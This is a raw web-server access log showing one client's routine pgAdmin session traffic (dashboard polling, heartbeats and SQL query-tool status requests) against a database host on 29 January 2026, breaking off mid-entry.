200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:03:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:03:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:04:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:04:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:05:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:05:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:06:38 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:06:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:06:38 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:06:38 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:06:40 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:06:40 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:06:42 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:06:42 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:06:44 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 137] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:06:44 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 309] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:06:44 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:06:44 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:06:45 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:06:46 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:06:48 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:06:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:06:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:06:58 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:07:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:07:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:11 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:08:13 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:08:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:08:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:09:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:09:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:09:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:09:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:09:43 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:09:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:09:43 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:09:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:09:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:09:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:10:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:10:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:10:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:10:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:10:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:10:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:10:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" 